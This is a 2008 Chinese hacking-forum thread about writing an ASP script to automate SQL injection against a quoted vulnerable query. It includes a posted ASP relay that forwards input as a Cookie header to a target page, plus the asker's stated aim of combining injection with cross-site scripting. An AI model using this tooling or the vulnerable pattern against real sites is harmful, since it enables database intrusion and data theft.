返回列表 发帖

[讨论]请问如何用ASP写自动注入脚本?


[讨论]请问如何用ASP写自动注入脚本?
议题作者:落叶纷飞
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

请问如何用ASP写自动注入脚本啊?

漏洞代码如:
......
select * from news where id = & request("id") &

......

该如何写自动注入脚本呢?

没明白你的意思,何谓“自动注入”I love amethyst!

帖子177 精华0 积分3591 阅读权限100 性别男 来自浙江 在线时间215 小时 注册时间2007-1-18 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

netbee201
晶莹剔透§烈日灼然

TOP

你说的是自动防注入吧。。。
帖子2 精华0 积分7 阅读权限40 性别男 在线时间36 小时 注册时间2006-7-8 最后登录2008-7-20 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

落叶纷飞
荣誉会员

TOP

就是说,怎么写个脚本去对这个注入点进行注入啊?
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

樱花浪子
荣誉会员

TOP

欠钱弄过PHP的COOKIE注入程序,你可以把他那个拿过来改下,还是非要弄ASP的??
帖子16 精华0 积分51 阅读权限100 在线时间52 小时 注册时间2006-6-17 最后登录2008-7-20 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

落叶纷飞
荣誉会员

TOP

引用:
原帖由 樱花浪子 于 2008-6-28 23:01 发表
欠钱弄过PHP的COOKIE注入程序,你可以把他那个拿过来改下,还是非要弄ASP的??
哪里有啊??给我个地址好么?谢谢了

晕,我只是想用asp来实现,用asp来实现应该要用到xmlhttp把??
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

独孤依人
荣誉会员

TOP

VBS可以实现,ASP发包太慢
不要说VBS和ASP没有区别
试试就知道了脚本安全小组:Www.Cnsst.Org MSN:cn557@hotmail.com  我们这帮兄弟,永远的兄弟——We are not the only ones,but we will try to be the best!——All In Script 脚本渗透自用利器开发中……
帖子298 精华12 积分3962 阅读权限100 性别男 在线时间901 小时 注册时间2006-4-22 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

落叶纷飞
荣誉会员

TOP

花了几天时间终于弄了出来~~~

其实我的主要目的是能直接在web页面注射~~~

配合跨站用,嘿嘿小鸡鸡重出江湖了~~!!
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

weknow
晶莹剔透§烈日灼然

TOP

复制内容到剪贴板
代码:
<%
Str="id="&escape(request("FK"))
Url="http://localhost/test.asp"
response.write PostData(Url,Str)

Function PostData(PostUrl,PostCok)
  Dim Http
  Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
  With Http
    .Open "GET",PostUrl,False
    .SetRequestHeader "Cookie",PostCok
    .Send
    PostData = .ResponseBody
  End With
  Set Http = Nothing
  PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
  Dim strReturn
  Dim I, ThisCharCode, NextCharCode
  strReturn = ""
  For I = 1 To LenB(vIn)
    ThisCharCode = AscB(MidB(vIn, I, 1))
    If ThisCharCode < &H80 Then
      strReturn = strReturn & Chr(ThisCharCode)
    Else
      NextCharCode = AscB(MidB(vIn, I + 1, 1))
      strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
      I = I + 1
    End If
  Next
  bytes2BSTR = strReturn
End Function
%>
不知道是不是LZ要的
帖子9 精华0 积分29 阅读权限40 在线时间5 小时 注册时间2006-10-14 最后登录2008-7-9 查看详细资料引用 报告 回复 TOP

落叶纷飞
荣誉会员

TOP

问题已解决拉,不过还是谢谢楼上的兄弟~~~小鸡鸡重出江湖了~~!!
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

zmhack
晶莹剔透§烈日灼然

TOP

有这么神奇吗 ASP还是没时间学d

帖子11 精华0 积分38 阅读权限40 在线时间15 小时 注册时间2007-3-16 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

hum2049
晶莹剔透§烈日灼然

TOP

靠,这种垃圾贴就不该留下,大家都在帮他解决,他自己解决了就闪一边去了,不管怎么样,你也应该吧如何解决问题 写出来吧!!!
帖子12 精华0 积分18 阅读权限40 性别男 在线时间17 小时 注册时间2006-3-10 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP

落叶纷飞
荣誉会员

TOP

返回列表